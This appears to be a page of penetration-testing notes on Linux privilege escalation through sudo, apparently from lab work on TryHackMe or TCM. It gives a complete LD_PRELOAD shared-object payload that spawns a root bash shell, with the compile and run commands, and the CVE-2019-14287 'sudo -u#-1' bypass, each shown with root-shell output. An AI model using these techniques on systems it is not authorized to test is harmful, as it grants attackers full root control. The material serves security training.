Run Sudo

LD_PRELOAD

If the compromised user has LD_PRELOAD permission then we can use the following technique to escalate the privileges.

TCM@debian:~$ sudo -l
Matching Defaults entries for TCM on this host:
    env_reset, env_keep+=LD_PRELOAD

User TCM may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

Copy the following code.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        system("/bin/bash");
}

Compile it.

TCM@debian:~$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
TCM@debian:~$ sudo LD_PRELOAD=/home/user/shell.so apache2
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

!ROOT CVE-2019-14287

If you check permissions with sudo -l and you notice the following:

tryhackme@sudo-privesc:~$ sudo -l
Matching Defaults entries for tryhackme on sudo-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tryhackme may run the following commands on sudo-privesc:
    (ALL, !root) NOPASSWD: /bin/bash <-----

Use the following command to pop a root shell. We can take over any other user in the system by modifying the "-1" value to the UID value of the target user. Read More.

tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)

PreviousShadow NextSUID

Last updated 6 months ago